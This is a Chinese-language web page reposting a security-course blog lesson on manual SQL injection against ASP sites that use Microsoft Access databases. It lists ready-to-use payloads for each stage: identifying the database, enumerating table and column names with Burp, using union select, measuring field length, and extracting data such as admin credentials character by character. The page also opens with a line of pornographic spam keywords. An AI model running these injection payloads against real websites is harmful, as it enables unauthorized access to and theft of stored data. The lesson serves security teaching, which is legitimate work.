国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

網(wǎng)絡安全進階學習第十二課——SQL手工注入3(Access數(shù)據(jù)庫)

2年前作者:p36273分類:Toy博客閱讀(29)違法舉報

這篇具有很好參考價值的文章主要介紹了網(wǎng)絡安全進階學習第十二課——SQL手工注入3(Access數(shù)據(jù)庫)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

注入流程:

判斷數(shù)據(jù)庫類型 ——> 判斷表名 ——> 判斷列名 ——> 判斷列名長度 ——> 查出數(shù)據(jù)。

asp的網(wǎng)站,常用數(shù)據(jù)庫為access、sqlserver。

1、判斷數(shù)據(jù)庫類型

and exsits (select * from msysobjects)>0 access
and exsits (select * from sysobjects)>0 sqlserver

上述語句會返回1或者0。
msysobjects是access的默認數(shù)據(jù)庫,
sysobjects是sqlserver的默認數(shù)據(jù)庫

如圖:
網(wǎng)絡安全進階學習第十二課——SQL手工注入3(Access數(shù)據(jù)庫),web安全,web安全,學習
網(wǎng)絡安全進階學習第十二課——SQL手工注入3(Access數(shù)據(jù)庫),web安全,web安全,學習
這里就能判斷是access的數(shù)據(jù)庫。

2、判斷表名

遍歷表名:and exists (select * from 表名)
#存在就返回正常頁面,不存在就報錯。

舉例:
and exists (select * from admin_user)

使用BP對后面的admin_user所在位置的值進行遍歷
假設這里跑出來表名就是:admin_user

3、判斷列名

遍歷列名:and exists (select 列名 from 表名)
#存在就返回正常頁面,不存在就報錯。

舉例:
and exists (select admin from admin_user)

已經(jīng)得知表名是admin_user,使用BP對列名admin所在位置的值進行遍歷
假設這里跑出來列名就是:admin

4、判斷列數(shù)

order by 7
網(wǎng)絡安全進階學習第十二課——SQL手工注入3(Access數(shù)據(jù)庫),web安全,web安全,學習
前提:頁面中需要有顯示位

1)判斷顯示位

使用聯(lián)合查詢
union select 1,2,3,4,5,6,7 from admin_user

5、判斷數(shù)據(jù)長度

and (select top 1 len(列名) from 表名)>5
#此為此列第一條數(shù)據(jù)的長度,判斷其是不是大于5

and (select top 1 len(列名) from 表名)=5
#此為此列第一條數(shù)據(jù)的長度是不是等于5

舉例:
and (select top 1 len(admin) from admin_user)=5

假如返回是真,那就說明admin_user這個表里面對應的admin這一列的第一個數(shù)據(jù)長度時5.

6、爆破數(shù)據(jù)內(nèi)容

and (select top 1 asc(mid(列名,位數(shù),1)) from admin)=97
#mid()用于從文本中提取字段,mid(列名,起始位置,要返回的字符數(shù))
#asc()是進行ASCII編碼

舉例:
and (select top 1 asc(mid(admin,1,1)) from admin_user)=97(97對應的字母為a)

#若返回真,說明admin_user這個表中admin字段對應的那一列的第一條數(shù)據(jù)的第一位是 ’ a ’文章來源地址http://www.zghlxwxcb.cn/news/detail-668526.html

到了這里,關于網(wǎng)絡安全進階學習第十二課——SQL手工注入3(Access數(shù)據(jù)庫)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 網(wǎng)絡安全進階學習第十五課——Oracle SQL注入

    網(wǎng)絡安全進階學習第十五課——Oracle SQL注入

    Oracle數(shù)據(jù)庫系統(tǒng)是世界上流行的關系數(shù)據(jù)庫管理系統(tǒng),系統(tǒng)可移植性好、使用方便、功能強,適用于各類大、中、小微機環(huán)境。它是一種高效率的、可靠性好的、適應高吞吐量的數(shù)據(jù)庫方案。 Oracle服務默認端口:1521 Oracle和MySQL數(shù)據(jù)庫語法大致相同,結構不太相同。 最大的一

    2024年02月11日
    瀏覽(26)
  • 網(wǎng)絡安全進階學習第十三課——SQL注入Bypass姿勢

    網(wǎng)絡安全進階學習第十三課——SQL注入Bypass姿勢

    1、like,rlike語句,其中rlike是正則 2、大于號,小于號 3、符號:為不等于的意思相當于!= 4、采用regexp函數(shù) 5、in 6、between 1、 substring、substrB 2、 locate(str1,str2) 返回str1字符串在str2里第一次出現(xiàn)的位置,沒有則返回0; locate(str1,str2, pos ) 返回str1字符串在str2里pos(起始位置)出現(xiàn)

    2024年02月13日
    瀏覽(23)

  • 從0開始學習C++ 第十二課:指針強化

    學習目標: 理解常量指針與指針常量的區(qū)別。 學習如何使用函數(shù)指針。 掌握指針與數(shù)組的高級使用技巧。 學習內(nèi)容: 常量指針與指針常量 概念: 常量指針是一個指向常量的指針,這意味著不能通過這個指針來修改其指向的值。指針常量是一個指針,其自身的值不可以修改

    2024年01月22日
    瀏覽(18)
  • 無人駕駛實戰(zhàn)-第十二課(強化學習自動駕駛系統(tǒng))(完)

    無人駕駛實戰(zhàn)-第十二課(強化學習自動駕駛系統(tǒng))(完)

    在七月算法上報了《無人駕駛實戰(zhàn)》課程,老師講的真好。好記性不如爛筆頭,記錄一下學習內(nèi)容。?課程入口,感興趣的也可以跟著學一下。 ————————————————————————————————————————— 強化學習:通過和環(huán)境交互學習到如何

    2024年02月13日
    瀏覽(27)
  • 網(wǎng)絡安全入門學習第十課——DNS欺騙

    網(wǎng)絡安全入門學習第十課——DNS欺騙

    域名系統(tǒng)(英文:Domain Name System,縮寫:DNS) 是互聯(lián)網(wǎng)的一項服務。 作為將域名和IP地址相互映射的一個分布式數(shù)據(jù)庫,能夠使人更方便地訪問互聯(lián)網(wǎng)。DNS使用TCP和UDP端口53。 我們本地的計算機在接入網(wǎng)絡的時候,都會自動分配一個DNS服務器的IP地址,這個DNS服務器叫做本地

    2024年02月06日
    瀏覽(23)
  • 網(wǎng)絡安全入門學習第十七課——PHP數(shù)組

    網(wǎng)絡安全入門學習第十七課——PHP數(shù)組

    索引數(shù)組是指 鍵名為整數(shù) 的數(shù)組。 默認 情況下,索引數(shù)組的 鍵名是從0開始 ,并依次遞增。它主要適用于利用位置(0、1、2……)來標識數(shù)組元素的情況。另外,索引數(shù)組的鍵名也可以自己指定。 關聯(lián)數(shù)組是指 鍵名為字符串 的數(shù)組。通常情況下,關聯(lián)數(shù)組元素的“鍵”和

    2024年02月09日
    瀏覽(20)

  • 網(wǎng)絡安全入門學習第十七課——PHP表單交互

    表單的主要功能:就是在網(wǎng)頁上用于輸入信息的區(qū)域,收集用戶輸入的信息,并將其提交給后端的服務器進行處理,實現(xiàn)用戶與服務器的交互。 例如:購物結算、信息搜索等都是通過表單實現(xiàn)的。 一個完整的表單是由表單域和表單控件組成的。其中,表單域由form標記定義,

    2024年02月12日
    瀏覽(24)
  • 網(wǎng)絡安全進階學習第八課——信息收集

    網(wǎng)絡安全進階學習第八課——信息收集

    信息收集(Information Gathering)信息收集是指通過各種方式獲取所需要的信息。滲透的本質(zhì)是信息搜集,而信息搜集整理為后續(xù)的情報跟進提供了強大的保證。 目標資產(chǎn)信息搜集的程度,決定滲透過程的復雜程度。 目標主機信息搜集的深度,決定后滲透權限持續(xù)把控。 收集信

    2024年02月13日
    瀏覽(34)

  • 【代碼隨想錄python筆記整理】第十二課 · 位置互換

    前言: 本筆記僅僅只是對內(nèi)容的整理和自行消化,并不是完整內(nèi)容,如有侵權,聯(lián)系立刪。 ? ? ? ?這節(jié)我們討論一個簡單的問題——怎么交換兩個變量的值。比如說,一個瓶子里是水,一個瓶子里是油,想要將兩個瓶子中的東西互換,我們應該怎么做呢?要實現(xiàn)上述過程,

    2024年02月21日
    瀏覽(93)
  • 網(wǎng)絡安全進階學習第五課——文件上傳漏洞

    網(wǎng)絡安全進階學習第五課——文件上傳漏洞

    大部分的網(wǎng)站和應用系統(tǒng)都有上傳功能,如用戶頭像上傳,圖片上傳,文檔上傳等。 由于對上傳文件 未作過濾 或 過濾機制不嚴(文件后綴或類型) ,導致惡意用戶可以上傳 腳本文件 ,通過上傳文件可以達到控制網(wǎng)站權限的目的。 攻擊者可獲得網(wǎng)站控制權限; 查看、修改

    2024年02月06日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包